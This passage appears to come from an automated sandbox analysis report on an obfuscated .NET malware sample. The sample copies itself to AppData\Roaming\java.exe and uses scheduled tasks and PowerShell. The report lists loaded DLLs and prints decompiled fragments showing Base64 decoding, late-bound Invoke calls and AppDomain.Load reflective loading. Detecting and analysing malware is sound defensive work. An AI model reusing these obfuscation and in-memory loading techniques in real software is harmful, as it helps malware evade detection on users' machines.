                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\java.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: java.lnk.0.drLNK file: ..\..\..\..\..\java.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt._4bsK7RucmrV6WdjtjwArUiADXQuweRfXmix2RxjDnCBmlPnc2qwJ,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.bcnnRDXz7xSOfGx7U70JmxYRijsQDOE5vDBiollclBFMPOXGlpbo,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.S2SNlsqEExtrK68xhuYoBGDuqP2MGB29k3cn5XU84AFDozqUw2pi,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.p6zwrAdeQTwpb5oxJvVBAmcxvdkXv4kG0yuV9gVsZm6cEKFxDfC7,gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.KmhMex9YyAfS6AOatebnkcmwSCGWRPRS5Vvs3U6kARFb9SEd9bQob4QtxuBFATr5QsJevR()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[2],gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.eZ2Yx9fmSDDM(Convert.FromBase64String(A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt._4bsK7RucmrV6WdjtjwArUiADXQuweRfXmix2RxjDnCBmlPnc2qwJ,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.bcnnRDXz7xSOfGx7U70JmxYRijsQDOE5vDBiollclBFMPOXGlpbo,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.S2SNlsqEExtrK68xhuYoBGDuqP2MGB29k3cn5XU84AFDozqUw2pi,nbzxY3Uee1CRyZ11XxamWnTTLz6Y4j0TflqJSCXvqjEHl6vKzRSt.p6zwrAdeQTwpb5oxJvVBAmcxvdkXv4kG0yuV9gVsZm6cEKFxDfC7,gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.KmhMex9YyAfS6AOatebnkcmwSCGWRPRS5Vvs3U6kARFb9SEd9bQob4QtxuBFATr5QsJevR()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[2],gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.eZ2Yx9fmSDDM(Convert.FromBase64String(A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { A3HWRwL0H2NapROTqK2qJIe9VzPlcadcnxDI3HdFEFlAr0VzMt9FI6qJMPpxLAH1uZ50QyVtXf09GrVimPpO[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: zKibE8Wp88nxv8n04w3dl7pqOhYe8zG2ETm6CSgSWwRc4QaAlpbO System.AppDomain.Load(byte[])
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: OxHZIE96j55IehWMppetm8WVRS4m4tGK85OOAGRDKqDyMnsUL0Z30ny0hn5ZG8yihFDgHC08iiyOAAah64X5 System.AppDomain.Load(byte[])
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: OxHZIE96j55IehWMppetm8WVRS4m4tGK85OOAGRDKqDyMnsUL0Z30ny0hn5ZG8yihFDgHC08iiyOAAah64X5
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: zKibE8Wp88nxv8n04w3dl7pqOhYe8zG2ETm6CSgSWwRc4QaAlpbO System.AppDomain.Load(byte[])
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: OxHZIE96j55IehWMppetm8WVRS4m4tGK85OOAGRDKqDyMnsUL0Z30ny0hn5ZG8yihFDgHC08iiyOAAah64X5 System.AppDomain.Load(byte[])
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.cs.Net Code: OxHZIE96j55IehWMppetm8WVRS4m4tGK85OOAGRDKqDyMnsUL0Z30ny0hn5ZG8yihFDgHC08iiyOAAah64X5
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD34825830 push esp; retf 0_2_00007FFD34825939
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD34819AF2 push 8B48FFFFh; retf 0_2_00007FFD34819AF7
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346ED2A5 pushad ; iretd 2_2_00007FFD346ED2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFD346DD2A5 pushad ; iretd 6_2_00007FFD346DD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD3470D2A5 pushad ; iretd 10_2_00007FFD3470D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD348F2A60 pushad ; ret 10_2_00007FFD348F2A61
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD346FD2A5 pushad ; iretd 16_2_00007FFD346FD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFD3481BC9D push E859A9D5h; ret 16_2_00007FFD3481BCF9
                      Source: file.exe, M3ptmYTEMWAB.csHigh entropy of concatenated method names: 'gp0YsiynZN2g', 'ZJeDT3GM4FAI', '_7RXI3dHEz7cY', 'jwSgEdSdtxBDkHM8doDYT2bm5wCvFBHIdV2xbZ9TQjsw', 'jrJxF4cshpRI5Jun2fE5xY8S6QQAHqcQU11Dqxol8Wwf', 'wUzLfYEtJE2o8tmDDRhMKhyfIIn3zHpzATS9GY44DThY', '_6X5HbTHT6YTncQjrKAJT7QY1YlQ5kWZEVcl1OkUmmjrb', 's3BR8naHMaxJjtvjNvTB2fpMnGdxdr0REsW5sCeIr2ik', 'b4h4aINGFxClKY152GZbLLHupdHRclxMmM9S8qiHd6H3', 'WpGAqzJgyR8tM5zIqHl2NFbB8nT1hupH2mZtYTt00XTT'
                      Source: file.exe, oUSjexChAppVeZ0ssdAFPwDkWXxbab01CmKmwzOxDTQlROrDuiAXIY2FlLivid05l5gtq3bsePKqC8j1SD69.csHigh entropy of concatenated method names: 'eoIbG65tXTLI1ovgnEYFVlPFGOxpb7IyOBvRHsYTcyoFep1lotqAP6nJQx9pYEjusVXbqUYKFfHMenpI6vj7', 'vwbRRbp0DPbuNeBPC6SJVcHxG74TUCpFzBwNBpvmM1H9i2KpusikL3PDc5G9gVwn4VdRGyJ4fwtuD6YrJKeG', 'PH3IN4pJQQEwMJwsgExia9LLbq8hQf2Iitut38JpCaXP9HaDNATxVUsVntMSUhEWToHt6F7uZYsmxUrqX9QE', 'FsjMtX6CksBD2fQTbpR0J456l0kFaBaTWqlWtDJWiQRgUsgQgE7P9Ez95OhGBYKB2PGKyp5JMZPScEOULCTS', 'QRscHXwe6naR533Itv72zUYuxOYGrl2X10cDAlSml7MhhijZDK4F1rZa6pHS0WuH4F5hX7o32WfGjxnqreY0', '_37nVgjyftjav8fqppob1umrDaEEXTt6GZaMeVC9eFlAxfdt1kshibFSjaHkP514cLlQQY6AxxrPuxEFR23R0', 'CXpwLISPdlzvt4WhUoQJdfnjEXHAzgILstaFvcPLRZ5sRF9rlQ7caHAkWnvXezskl7YKaE', 'zUgsPnV0pMXQQYBPlYTY9vcydeeLOQZ8T0BTRWzjPKDj24S4kC9eryHJj0FZkof8Br2SeG', 'giWTIEtPY6s2TTMdElhcIfHznwL2iB3SIG6FnQnUgJNbkOcZWVp2w4av34TF3TzyW1xmVe', 'Kj9AsEKucDvkEFi3gLYQ99e0qUwbF4IVYNf1edNU5TIRYjVIcAN7xXF3ASiM0w3IzKwNNK'
                      Source: file.exe, Y8h7ekJtf53H0CKI3TPYR0r2hfbocajvKPfw7qmK0mHFfSEcPGyNpfuNYvlDLId5P2lOvgFAbFGDEZNnyBYT.csHigh entropy of concatenated method names: 'adu2aADrBuccvNNVVqSYZvpM0CI2bK65BDDOkJuGc5u5TETvDmdYiD3dcJK1VjB7LJ62egwZ8d9nxOnH5P6I', 'DbokZYNxK5jo', 'zL0WYwWebm6Q', 'zpZDpsxeCjZN', 'hP7bv425jNx5'
                      Source: file.exe, DljV7yiUkhCKNzMv1XVMfbgUlqgzoInv7AwX78o2Ex4GkkReKlme.csHigh entropy of concatenated method names: 'jAq1IF3ddT6yLauHMQ9ulW51GahEKkZAp4wltElr9cQr5An5kUG9', '_9dEOpkJ3Dq8oShOesEd8DvQBAmaB11hTtRYMZX6Qm85LOYtDQ7i0', 'ap5p6bw8wLI8kV5xzdq6OYf49TXs5f2suYKNxw72BJuNp8kVjt4B', 'Jwk1cSMp1N9sOoPX59MQWyTdK2nsCi7UQAkeAqrfQ0BMeG1DQYTi', 'cdArGSxxIWGJLRYD0ScTXdLdPOhKxFZkewXOJRCFXcXKGZyER9bi', 'XiI0IghF6vkESZYqvtufVUoxLSa0pIYGT7MFefCGPL4pHTip8mu5', 'EoTFQxammhuLUBJkjVlCLWt65An0Iq7bvsl1Gl2Jd8rl6e9HuLg8', '_0qMZZNLpRow6uB439hJQ6N1EIVRFUcH8xsu70SXMQQ9RetyY9xEp', 'VQ7oGuif7XZxSBgryQEvLrLklrrx0aFadkeXNgEHbfOHizH7fCgW', 'f8pAdl1TaVWhlXDJZAcYACtV8KE9H2PQ7ePcEq9Zz7NFywyIHVnJ'
                      Source: file.exe, TnkVrkY3pzpsXLvpbg5h5iy5VedjuwVFGSS6BCERLvB8fB5fbBpZFY98GKSp1zkmVAig0QbcPhKpZOpXoewG.csHigh entropy of concatenated method names: 'lxsRUalp7Sg5NhoGnEPHunq7XaYydqXMfFzAsCoIPDCzcrBEiEa4VNxrpAbMhXtEp2BOgvWkXKVnHNdlNRI1', 'SbUogYgk7G6CW6vGOrYzdCjVbMnhnLCzT3u5RU7ibqiSWQHTB98jA4jou9LEaNOHevryJspyWJqcpPl2lFNb', 'yY9DHJDJQDPXjZOYzR2Owk5tEhhjovURDE47VcpN25uQPhYERvrpwl3aXbgsSlaatGRlNT5LXdH98l2Azuoh', 'GjyMXiI0TqDZ', '_5pe4xfICrp8h', 'AbR7Qp6SydzU', '_4zkxFCAzc82D', 'F62mTq12pG2X', 'nKMUxWyYhUK9', 'CgofFNSWMm9s'
                      Source: file.exe, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.csHigh entropy of concatenated method names: 'IHQS8QYOd9moTDSEanN1sjHTnpWeVVazAJmyR9eXcJg22lwl2vE8', 'zKibE8Wp88nxv8n04w3dl7pqOhYe8zG2ETm6CSgSWwRc4QaAlpbO', 'cNG5tRkwJTR1ownoIngSH7wBj8bt7IRyOUY9vaZXQLTuS2bXnPHQ', 'Br5UcZpabKJNZniYHTkCKnrvNKecH9pu1ObE2kgcIm0LwOIZstUm', '_1XkoJBGYXI6Z5TAuHXWFwe05mpfAG86pKq3f5qWypCZiKa9AKaOA', 'wys04OiEHyhSCtRbRseGjbugPF7ntCeFw0li8k7sJRhikp9BNBhpjMvIueNt5OPD1TdzFUfdv7X9kSAsiTRr', '_8gJipHAkBOqFIWaBgGBlKaW0AmEicjychUwFToOPojJWifOGQkH8S8Eg8nKD1zbCIJztDwru95y4B72UbmvO', '_2rbEPVG6nb4uL4UdI1gmoLv4qa8i3dmTxMOrxQTkScGFm6UmrRsQRMlUmzj8kSrxqjNEjzS0slfXAFfWWwcn', 'uL1DwVlYMUkTdnhwnmAnaqk0tt6mayGu1ElOOdpSpuRwHa7BetGSQvHbsyH7BnrCgRzM8tAhbcAEMZzSZgbV', 'Fa7heNWSiOMFvASfglCx9UqGjkwzm7pMdqK9RS7xVOCZbiMmKjab3hMRz0tT792MRNSD7TJ5EiEAOwT3ZpIn'
                      Source: file.exe, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.csHigh entropy of concatenated method names: '_0sZQYedQljFSbXXuOyuPxQdGKQELj0m0REObc239KzIUZYGFf8ji5CEhsB9mIjAddO3ohy', 'BoHDOoCcD96rKe1oXlAqYjRFAk0e6ec6EPHPZRhV0073w7ZsAmJ344EEwcvWomFToSvgGQ', 'GpBfp25jiKTpysZ8XZxqlnl6JGyhJouJZxiVO27sSSfNWyWreFw1TGubxx0XPZiuVqxIVw', 'TStr6eh2tebBwJcgyoRwvx7j2JeAoS8V2KRIGrRtfb2mBuegLPYnVhtGR8aR7xSVZedbu3', 'H4XDsSzLbdVnNJNuAicSH4sSiDVURiJiznnTy4I7V6d2QlycoWNrnMXzFIqGohSlLouYBl', 'hVsQkBRc0RNdXppjpR6d5e7aV8pXHXKLMIhwTZN0nP6m9Kq4KEwRLaKrf7n4Vig6INZC3A', 'BXnUn5K2xegL2grzQdkWolfQgjEcKm5rIyJ1CTbA4INmuTpelc6uihWmvOSKEHg9V1emDt', 'hrQJ8hfahL8zJzaOiYNo1ikssYmRGBdaX2uXlntMxnrjvOME4uj4qAqywRiqcCT5LPdKmh', 'Id2EO9nStfroOxv9GFmQk4t4x3K2Na4glKwMgpE7ebwcj54DStsQRul4M5E6PdMMt5fXl8', 'BxXFvzqTQ3Pkl8o8oA2wA3Ullqj3oMLgFJwMj8qcOWXModCyuxpSas54zQhD8pX2nztdKw'
                      Source: file.exe, Cqf5ySADqnBBZJSGBs6XL0JHhzclJSTcTFxQnT47pV9tLeSqr21xtsUx8EfmB3gZ47HrV3.csHigh entropy of concatenated method names: 'RqwE2GFuZfPUcJIcLBq3XX4TWcKN4NeBcC3owGqrsHgnPg8fcDMT2FTM9u1BPz1gWVKCDD', 'LwgBdoAJo6UU7T6dX82c19OKryiQHMZMkjG5iR5wKHkDuWH9J63uF0VR8pTKfHq0oHreUv', 'aHot2acFS5B8E3y8257ImU23ft1YZ14AKlcRbyr34qG9pMqHRLBWFYRSnBU33sxUNVLh2m', 'EY3Vih6tyin3ziN3AUFlzEoGl6pVfBhktI7RZapZwNVHIzaooGjR4CQwfclTcgNLdIfTNB', 'wf4G9slVDSMC', 'd4xfPfAvuBgg', 'MkVl2W4HuHga', 'vZnHyxzgm4el', 'zBnj4uHa8HGC', 'qSZb8axXCDZm'
                      Source: file.exe, 775VniLT7bBOBCrgmDFH7fyve0dFdV6L3kiBaHDulpBhielIdxD38ipbQTK42LW6agwC07.csHigh entropy of concatenated method names: 'T6K5wpb8o6jbbx1kRkiuj8cGRFvn9UfmJ2j1BgmUx0J2PCOR4qkwF26LHswdenuZ22A2Ht', '_55GbWsfTknBQ', 'lACv4mMLFCLy', 'RJcVX7XqfS8N', 'zsv7fUUItM9C'
                      Source: file.exe, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csHigh entropy of concatenated method names: 'ytTJeaHBMZWBiKLPVFx3poRI0l1uJwq0MUUgA8FLnqh9ETdaW7FY', 'Jx1mjn7Ud3qlURoYy7Sl2fJeczHcya1KYR2LGeW7CWXovlBOm4Rq', 'sHt8heCBFmzo5DkswFX462I6hvwWcUBpif9DL5l4kfjgbAUiV2RT', 'kBG0UhwPFOGO8FOQQ5cnkUwRUOpIylq2KodeXX1X1VG5SSnQzKhF', 'jlZa1r2qdPhVrr8uGw7G0ujhhNuI1BVuAtn25R3MKoupMxAMYEGP', 'Z1fBvyDWNF6wNdzBrOYiHjiStu6o0p6NHe7zx88ogEZrkG1Emunx', 'fINzRsqpdNko3zAGgDDZSjwe7f9smxUwQTeLosUKDlP6RlkjEy7u', 'QhsO9etZ7leq4WlTrjoU9HrouhZrSiUdFfehMlFa1nsAfjD72vWy', 'JvH9qnWkWtw7IA4fjdNRFNhtCcOyxZJE9qLaM3VnZaxk7BwUOvc6', 'uVyEk9STM7Rev1s2XkUokUU0nRPcC2LphqvF5v8wTU4wjcWcH5zy'
                      Source: java.exe.0.dr, M3ptmYTEMWAB.csHigh entropy of concatenated method names: 'gp0YsiynZN2g', 'ZJeDT3GM4FAI', '_7RXI3dHEz7cY', 'jwSgEdSdtxBDkHM8doDYT2bm5wCvFBHIdV2xbZ9TQjsw', 'jrJxF4cshpRI5Jun2fE5xY8S6QQAHqcQU11Dqxol8Wwf', 'wUzLfYEtJE2o8tmDDRhMKhyfIIn3zHpzATS9GY44DThY', '_6X5HbTHT6YTncQjrKAJT7QY1YlQ5kWZEVcl1OkUmmjrb', 's3BR8naHMaxJjtvjNvTB2fpMnGdxdr0REsW5sCeIr2ik', 'b4h4aINGFxClKY152GZbLLHupdHRclxMmM9S8qiHd6H3', 'WpGAqzJgyR8tM5zIqHl2NFbB8nT1hupH2mZtYTt00XTT'
                      Source: java.exe.0.dr, oUSjexChAppVeZ0ssdAFPwDkWXxbab01CmKmwzOxDTQlROrDuiAXIY2FlLivid05l5gtq3bsePKqC8j1SD69.csHigh entropy of concatenated method names: 'eoIbG65tXTLI1ovgnEYFVlPFGOxpb7IyOBvRHsYTcyoFep1lotqAP6nJQx9pYEjusVXbqUYKFfHMenpI6vj7', 'vwbRRbp0DPbuNeBPC6SJVcHxG74TUCpFzBwNBpvmM1H9i2KpusikL3PDc5G9gVwn4VdRGyJ4fwtuD6YrJKeG', 'PH3IN4pJQQEwMJwsgExia9LLbq8hQf2Iitut38JpCaXP9HaDNATxVUsVntMSUhEWToHt6F7uZYsmxUrqX9QE', 'FsjMtX6CksBD2fQTbpR0J456l0kFaBaTWqlWtDJWiQRgUsgQgE7P9Ez95OhGBYKB2PGKyp5JMZPScEOULCTS', 'QRscHXwe6naR533Itv72zUYuxOYGrl2X10cDAlSml7MhhijZDK4F1rZa6pHS0WuH4F5hX7o32WfGjxnqreY0', '_37nVgjyftjav8fqppob1umrDaEEXTt6GZaMeVC9eFlAxfdt1kshibFSjaHkP514cLlQQY6AxxrPuxEFR23R0', 'CXpwLISPdlzvt4WhUoQJdfnjEXHAzgILstaFvcPLRZ5sRF9rlQ7caHAkWnvXezskl7YKaE', 'zUgsPnV0pMXQQYBPlYTY9vcydeeLOQZ8T0BTRWzjPKDj24S4kC9eryHJj0FZkof8Br2SeG', 'giWTIEtPY6s2TTMdElhcIfHznwL2iB3SIG6FnQnUgJNbkOcZWVp2w4av34TF3TzyW1xmVe', 'Kj9AsEKucDvkEFi3gLYQ99e0qUwbF4IVYNf1edNU5TIRYjVIcAN7xXF3ASiM0w3IzKwNNK'
                      Source: java.exe.0.dr, Y8h7ekJtf53H0CKI3TPYR0r2hfbocajvKPfw7qmK0mHFfSEcPGyNpfuNYvlDLId5P2lOvgFAbFGDEZNnyBYT.csHigh entropy of concatenated method names: 'adu2aADrBuccvNNVVqSYZvpM0CI2bK65BDDOkJuGc5u5TETvDmdYiD3dcJK1VjB7LJ62egwZ8d9nxOnH5P6I', 'DbokZYNxK5jo', 'zL0WYwWebm6Q', 'zpZDpsxeCjZN', 'hP7bv425jNx5'
                      Source: java.exe.0.dr, DljV7yiUkhCKNzMv1XVMfbgUlqgzoInv7AwX78o2Ex4GkkReKlme.csHigh entropy of concatenated method names: 'jAq1IF3ddT6yLauHMQ9ulW51GahEKkZAp4wltElr9cQr5An5kUG9', '_9dEOpkJ3Dq8oShOesEd8DvQBAmaB11hTtRYMZX6Qm85LOYtDQ7i0', 'ap5p6bw8wLI8kV5xzdq6OYf49TXs5f2suYKNxw72BJuNp8kVjt4B', 'Jwk1cSMp1N9sOoPX59MQWyTdK2nsCi7UQAkeAqrfQ0BMeG1DQYTi', 'cdArGSxxIWGJLRYD0ScTXdLdPOhKxFZkewXOJRCFXcXKGZyER9bi', 'XiI0IghF6vkESZYqvtufVUoxLSa0pIYGT7MFefCGPL4pHTip8mu5', 'EoTFQxammhuLUBJkjVlCLWt65An0Iq7bvsl1Gl2Jd8rl6e9HuLg8', '_0qMZZNLpRow6uB439hJQ6N1EIVRFUcH8xsu70SXMQQ9RetyY9xEp', 'VQ7oGuif7XZxSBgryQEvLrLklrrx0aFadkeXNgEHbfOHizH7fCgW', 'f8pAdl1TaVWhlXDJZAcYACtV8KE9H2PQ7ePcEq9Zz7NFywyIHVnJ'
                      Source: java.exe.0.dr, TnkVrkY3pzpsXLvpbg5h5iy5VedjuwVFGSS6BCERLvB8fB5fbBpZFY98GKSp1zkmVAig0QbcPhKpZOpXoewG.csHigh entropy of concatenated method names: 'lxsRUalp7Sg5NhoGnEPHunq7XaYydqXMfFzAsCoIPDCzcrBEiEa4VNxrpAbMhXtEp2BOgvWkXKVnHNdlNRI1', 'SbUogYgk7G6CW6vGOrYzdCjVbMnhnLCzT3u5RU7ibqiSWQHTB98jA4jou9LEaNOHevryJspyWJqcpPl2lFNb', 'yY9DHJDJQDPXjZOYzR2Owk5tEhhjovURDE47VcpN25uQPhYERvrpwl3aXbgsSlaatGRlNT5LXdH98l2Azuoh', 'GjyMXiI0TqDZ', '_5pe4xfICrp8h', 'AbR7Qp6SydzU', '_4zkxFCAzc82D', 'F62mTq12pG2X', 'nKMUxWyYhUK9', 'CgofFNSWMm9s'
                      Source: java.exe.0.dr, IIZsOIHyVySFh0VVLDPW8E8jMSN60EFJqf0X0fdB9CktI2DeQ6uM.csHigh entropy of concatenated method names: 'IHQS8QYOd9moTDSEanN1sjHTnpWeVVazAJmyR9eXcJg22lwl2vE8', 'zKibE8Wp88nxv8n04w3dl7pqOhYe8zG2ETm6CSgSWwRc4QaAlpbO', 'cNG5tRkwJTR1ownoIngSH7wBj8bt7IRyOUY9vaZXQLTuS2bXnPHQ', 'Br5UcZpabKJNZniYHTkCKnrvNKecH9pu1ObE2kgcIm0LwOIZstUm', '_1XkoJBGYXI6Z5TAuHXWFwe05mpfAG86pKq3f5qWypCZiKa9AKaOA', 'wys04OiEHyhSCtRbRseGjbugPF7ntCeFw0li8k7sJRhikp9BNBhpjMvIueNt5OPD1TdzFUfdv7X9kSAsiTRr', '_8gJipHAkBOqFIWaBgGBlKaW0AmEicjychUwFToOPojJWifOGQkH8S8Eg8nKD1zbCIJztDwru95y4B72UbmvO', '_2rbEPVG6nb4uL4UdI1gmoLv4qa8i3dmTxMOrxQTkScGFm6UmrRsQRMlUmzj8kSrxqjNEjzS0slfXAFfWWwcn', 